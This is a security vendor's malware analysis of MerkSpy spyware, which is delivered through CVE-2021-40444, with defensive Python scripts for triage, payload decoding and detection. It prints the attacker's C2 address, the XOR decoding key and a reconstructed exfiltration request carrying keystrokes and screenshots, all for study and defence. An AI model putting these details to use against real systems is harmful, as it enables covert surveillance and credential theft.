MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs

Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attacks
Severity Level: High

Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.

FortiGuard Labs recently detected an attack exploiting CVE-2021-40444 through a Microsoft Office document. This flaw allows attackers to execute malicious code via specially crafted documents. In this instance, the exploitation led to the deployment of a spyware payload known as “MerkSpy.” MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems.

This blog will dissect the stages of this complex attack, offering insights into the techniques used by cybercriminals to infiltrate systems and steal sensitive data.

Attack flow diagram of MerkSpy. It exploits CVE-2021-40444, downloads the file olerender.html, writes shell code, downloads GoogleUpdate, decodes data to get injector, injects MerkSpy, and then uploads stolen data to the address 45.89.53.46


Figure 1: Attack flow

CVE-2021-40444 Exploitation

The initial vector for this attack is a deceptive Microsoft Word document posing as a job description for a software developer position.

A screenshot of the Word document. It contains a job description for a software developer position.


Figure 2: Word document

Opening the document triggers CVE-2021-40444, a remote code execution vulnerability in MSHTML, the Internet Explorer rendering engine that Microsoft Office uses to render web content. The vulnerability lets an attacker execute arbitrary code on the victim’s machine with no user interaction beyond opening the document, provided the document is opened outside Protected View: Microsoft’s advisory for CVE-2021-40444 notes that Protected View and Application Guard for Office block this attack, so a file carrying the mark-of-the-web normally requires the user to click Enable Editing first. The attacker conceals the URL in the document’s relationships part, “_rels\document.xml.rels,” as an external relationship target. It points to hxxp://45[.]89[.]53[.]46/google/olerender[.]html, fetching the HTML file that stages the next phase of the attack.

The _rels\document.xml.rels relationships file. The relationship that fetches the remote HTML file is highlighted


Figure 3: _rels\document.xml.rels
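The external relationship described above is what an analyst should look for when triaging a suspicious Office document. The script below is an added example, not FortiGuard Labs’ code: it opens the document as the ZIP it is, walks every *.rels part, and reports relationships marked External whose Target uses a remote scheme (mhtml:, http: or https:). Hyperlink relationships are legitimately external, so they are ignored by default. The minimal .docx it builds for itself is constructed for demonstration; only the olerender.html URL comes from the report, and the relationship Ids and part layout are assumptions.

```python
"""Triage helper for documents abusing external relationships, as in the
CVE-2021-40444 chain above.  Added example, not FortiGuard Labs' code.
An Office Open XML file is a ZIP; every *.rels part lists relationships,
and a Relationship with TargetMode="External" whose Target uses mhtml:,
http: or https: pulls remote content.  Hyperlink relationships are
legitimately external, so they are ignored by default."""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_SCHEMES = ("mhtml:", "http:", "https:")
IGNORED_TYPES = ("hyperlink",)


def find_external_targets(docx_bytes, ignored_types=IGNORED_TYPES):
    """Return (part name, relationship Id, short Type, Target) for every
    relationship that is External and points at a remote scheme."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode", "Internal") == "External"
                        and short_type not in ignored_types
                        and target.lower().startswith(REMOTE_SCHEMES)):
                    hits.append((part, rel.get("Id"), short_type, target))
    return hits


def build_sample_docx(rel_type, target, external=True):
    """Constructed minimal .docx for demonstration: one benign styles
    relationship plus one relationship of the caller's choosing.  The
    layout mirrors how a CVE-2021-40444 document references its remote
    HTML; the Id values are arbitrary (assumption)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}{rel_type}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/styles.xml", "<styles/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# URL from the report (defanging brackets removed).  Public CVE-2021-40444
# documents wrap such URLs in an mhtml: prefix; the scheme check covers that too.
OLERENDER_URL = "http://45.89.53.46/google/olerender.html"

if __name__ == "__main__":
    for hit in find_external_targets(build_sample_docx("oleObject", OLERENDER_URL)):
        print("external relationship:", hit)
```

Run it against a real sample by passing the file’s bytes to find_external_targets; an oleObject (or any non-hyperlink) relationship with a remote target is the indicator to escalate on.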

ShellCode Preparation

After successful exploitation, the document fetches and renders “olerender.html” from the attacker’s server. The file is padded at the start with innocuous script and comments to disguise its purpose; the shellcode and the code that decodes, writes, and launches it sit at the end of the file, and that is what drives the attack forward when rendered on the victim’s machine.

The olerender.html file. The beginning of the file contains innocuous script and documentation


Figure 4: olerender.html

The code at the end of the olerender.html file with the shellcode and injection process


Figure 5: Code at the end of olerender.html

“olerender.html” first checks the OS version and architecture. On an x64 system it selects the embedded “sc_x64” shellcode.

OS checking in olerender.html


Figure 6: OS checking

After selecting the shellcode, “olerender.html” resolves the addresses of two Windows APIs, VirtualProtect and CreateThread. It XOR-decodes the shellcode, writes it into a buffer, calls VirtualProtect to change that buffer’s page protection so it becomes executable (a script-hosted process marking memory executable is the behavior to watch for here), and then calls CreateThread to start a new thread at the shellcode’s entry point. From this point the shellcode takes over and downloads the next payload from the attacker’s server.

olerender.html locates and retrieves the Windows APIs VirtualProtect and CreateThread


Figure 7: Retrieving the Windows APIs

Decoding the shellcode via XOR


Figure 8: Decoding the shellcode via XOR

Writing and invoking the shellcode


Figure 9: Writing and invoking the shellcode

ShellCode

Once running, the shellcode acts as a downloader for the next phase of the attack. It contacts the same remote server to fetch a file deceptively named “GoogleUpdate.” Despite the name, the file is not a Google component: it carries the next-stage payload in encoded form so that a static scan of the download sees no recognizable executable. After the download completes, the shellcode decodes the payload in memory and prepares it for execution.

Downloaded "GoogleUpdate"


Figure 10: Downloaded “GoogleUpdate”

Once “GoogleUpdate” is downloaded, the shellcode decodes it with an XOR key of 0x25021420 and an increment value of 0x00890518: a rolling XOR in which the key advances by the increment after each block. This step recovers the actual payload embedded in the file. It is obfuscation rather than encryption; it hides the payload from signature-based scanning of the file on disk and on the wire, but it is trivially reversible once the key and increment are known.

XOR-decoded GoogleUpdate file


Figure 11: XOR-decoded file and its payload injection
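The decoding step described above, written out as an added example (not FortiGuard Labs’ code and not the malware’s own routine). The key and increment are the values from the report; the granularity, one little-endian 32-bit word per step with the key incremented after each word modulo 2^32, is an assumption this example makes explicit. The encoded blob it works on is constructed here as a stand-in for “GoogleUpdate,” so the script runs offline.

```python
"""Rolling-XOR decoder for the "GoogleUpdate" blob.  Added example, not
FortiGuard Labs' or the malware's code.  Key and increment come from the
report; the per-dword little-endian granularity is an assumption."""
import struct

KEY = 0x25021420        # initial XOR key (from the report)
INCREMENT = 0x00890518  # added to the key after every block (from the report)
MASK = 0xFFFFFFFF       # keep the key at 32 bits


def rolling_xor(data, key=KEY, inc=INCREMENT):
    """XOR each little-endian dword with a key that advances by `inc`.
    XOR is an involution, so the same routine encodes and decodes.
    A trailing partial dword is XORed with the low bytes of the key."""
    out = bytearray(len(data))
    k = key
    for i in range(0, len(data), 4):
        chunk = data[i:i + 4]
        key_bytes = struct.pack("<I", k)[:len(chunk)]
        out[i:i + len(chunk)] = bytes(a ^ b for a, b in zip(chunk, key_bytes))
        k = (k + inc) & MASK
    return bytes(out)


def looks_like_pe(blob):
    """Sanity check an analyst applies after decoding: a DOS 'MZ' header
    and an e_lfanew that lands on the 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def make_fake_pe():
    """Constructed stand-in for the decoded injector: a 0x40-byte DOS
    header with e_lfanew = 0x40 followed by a PE signature.  Not malware;
    its length is deliberately not a multiple of four to exercise the
    partial-dword path."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\x00" * 20 + b"payload bytes"


if __name__ == "__main__":
    encoded = rolling_xor(make_fake_pe())   # what would sit in "GoogleUpdate"
    decoded = rolling_xor(encoded)
    print("PE header visible before decode:", looks_like_pe(encoded))
    print("PE header visible after decode: ", looks_like_pe(decoded))
```

To apply it to a real sample, read the downloaded file as bytes, pass it through rolling_xor, and check the result with looks_like_pe; if the check fails, try the obvious variants (per-byte instead of per-dword, key incremented before use) before assuming a different key.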

MerkSpy

The extracted payload is packed with VMProtect. Its primary function is to inject the MerkSpy spyware into system processes. Running inside those processes, MerkSpy captures sensitive information, monitors user activity, and exfiltrates the data to a remote server controlled by the attacker.

The Detect It Easy tool showing a file protected by VMProtect


Figure 12: A file’s information shown using the DIE (Detect It Easy) tool

MerkSpy achieves persistence by masquerading as Google Update, adding a registry value for “GoogleUpdate.exe” under “Software\Microsoft\Windows\CurrentVersion\Run.” This ensures that MerkSpy launches automatically at logon, so monitoring and data exfiltration continue without the user’s knowledge or consent.

Diagram illustrating how Merkspy creates a registry entry


Figure 13: Creating a registry entry

Once installed, MerkSpy begins monitoring and exfiltration: it captures screenshots, logs keystrokes, retrieves saved Chrome login credentials, and reads data from the MetaMask browser extension. It uploads the collected information to the attacker’s server at hxxp://45[.]89[.]53[.]46/google/update[.]php.

Switch cases of monitoring a compromised endpoint


Figure 14: Switch cases of monitoring a compromised endpoint

The POST request uses the User-Agent string “WINDOWS” and a fixed multipart boundary, “---------------------------update request,” so every check-in is a multipart/form-data submission with the same boundary, which makes the traffic straightforward to fingerprint. The request body consists of the following parts:

  • “id”—Specifies the client ID, which includes the computer’s hostname and the user’s name.
  • “check”—A status flag indicating the check-in.

Part of the request body with a status flag indicating the check-in.

  • “key”—Contains the data captured by the keystroke logger. When a large file is uploaded, this field instead carries the chunk index of the file being uploaded.

Part of the request body with the key that contains the data captured by the keystroke logger

  • “fileToUpload[]” – Represents an uploaded file, such as extracted login credentials or a screenshot.

Part of the request body with fileToUpload[], which represents an uploaded file

Part of the request body with fileToUpload[], which represents an uploaded file
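The check-in format above is specific enough to parse and detect. The script below is an added example, not FortiGuard Labs’ code: it builds a constructed request with the fields the report lists (User-Agent “WINDOWS,” a boundary ending in “update request,” the id/check/key/fileToUpload[] parts), parses the multipart body back into fields, and applies a detection heuristic built only from the report’s indicators. The field values, the hostname\user format of “id,” and the exact number of hyphens in the boundary are assumptions; the parser reads the boundary from the Content-Type header, so the hyphen count does not affect detection.

```python
"""Parser and detector for MerkSpy's check-in POST.  Added example, not
FortiGuard Labs' code.  The sample request is constructed; the indicators
(UA "WINDOWS", boundary ending in "update request", path /google/update.php,
the four field names) come from the report."""
import re

BOUNDARY = "---------------------------update request"  # hyphen count assumed


def build_sample_request(boundary=BOUNDARY):
    """Constructed check-in: hostname/user id, status flag, logged
    keystrokes, and one uploaded file standing in for a screenshot."""
    parts = [
        ("id", None, b"DESKTOP-TEST\\alice"),          # format assumed
        ("check", None, b"1"),
        ("key", None, b"[ENTER]password123[ENTER]"),
        ("fileToUpload[]", "screen.png", b"\x89PNG\r\n\x1a\n...truncated"),
    ]
    body = b""
    for name, filename, data in parts:
        body += f"--{boundary}\r\n".encode()
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        body += (disp + "\r\n\r\n").encode() + data + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    headers = (
        "POST /google/update.php HTTP/1.1\r\n"
        "Host: 45.89.53.46\r\n"
        "User-Agent: WINDOWS\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return headers.encode() + body


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body, boundary):
    """Return {field name: (filename or None, data bytes)} for each part."""
    delim = b"--" + boundary.encode()
    fields = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        hdrs, _, data = chunk.partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', hdrs)
        if not name:
            continue
        fname = re.search(rb'filename="([^"]*)"', hdrs)
        if data.endswith(b"\r\n"):
            data = data[:-2]
        fields[name.group(1).decode()] = (fname.group(1).decode() if fname else None, data)
    return fields


def is_merkspy_checkin(raw):
    """Heuristic from the report's indicators: POST to /google/update.php,
    User-Agent exactly "WINDOWS", multipart boundary ending "update request"."""
    req_line, headers, _ = parse_request(raw)
    match = re.search(r"boundary=(.*)", headers.get("content-type", ""))
    boundary = match.group(1).strip() if match else ""
    return (req_line.startswith("POST ")
            and "/google/update.php" in req_line
            and headers.get("user-agent") == "WINDOWS"
            and boundary.endswith("update request"))


if __name__ == "__main__":
    raw = build_sample_request()
    _, hdrs, body = parse_request(raw)
    print("MerkSpy check-in:", is_merkspy_checkin(raw))
    for field, (fname, data) in parse_multipart(body, BOUNDARY).items():
        print(f"{field:15} filename={fname!r:14} {data[:24]!r}")
```

The same three conditions translate directly into a proxy or IDS rule; the boundary suffix is the most durable of them, since the IP and path can change between campaigns.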

Based on telemetry from the C2 server at “45[.]89[.]53[.]46,” a significant activity spike began at the end of May, primarily targeting North America and India.

World map showing the telemetry from the C2 server. The activity primarily focuses on North America and India.


Figure 15: Telemetry

Conclusion

The initial phase of the attack exploits CVE-2021-40444 in the MSHTML component used by Internet Explorer. Exploitation fetches a file named “olerender.html,” which contains JavaScript and embedded shellcode. The shellcode downloads and decodes “GoogleUpdate,” a VMProtect-packed injector that loads the MerkSpy spyware into memory and injects it into running processes. MerkSpy then carries out surveillance, including keystroke logging, screenshot capture, and harvesting of Chrome browser login data, and exfiltrates the results over multipart POST requests to the attacker’s server. By understanding each stage of this chain, organizations can place detections where they matter: the external relationship in the document, the script process marking memory executable, the “GoogleUpdate” download and Run key, and the distinctive check-in traffic. FortiGuard Labs remains vigilant in monitoring these threats and offers ongoing intelligence to safeguard our users.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

MSOffice/Agent.AN!tr

HTML/Agent.SC!tr

Data/Agent.C1FT!tr

W64/Injector.SRQ!tr

FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.

The FortiGuard CDR (content disarm and reconstruction) service, which runs on both FortiGate and FortiMail, can disarm the active content in the document. Note that this sample relies on an external OLE object relationship rather than a VBA macro, so macro-only controls do not address it.

We also suggest that organizations go through Fortinet’s free NSE training module: NSE 1 – Information Security Awareness. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.

The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs

IP Addresses

45[.]89[.]53[.]46

Files

92eb60179d1cf265a9e2094c9a54e025597101b8a78e2a57c19e4681df465e08

95a3380f322f352cf7370c5af47f20b26238d96c3ad57b6bc972776cc294389a

0ffadb53f9624950dea0e07fcffcc31404299230735746ca43d4db05e4d708c6

dd369262074466ce937b52c0acd75abad112e395f353072ae11e3e888ac132a8

569f6cd88806d9db9e92a579dea7a9241352d900f53ff7fe241b0006ba3f0e22

6cdc2355cf07a240e78459dd4dd32e26210e22bf5e4a15ea08a984a5d9241067 
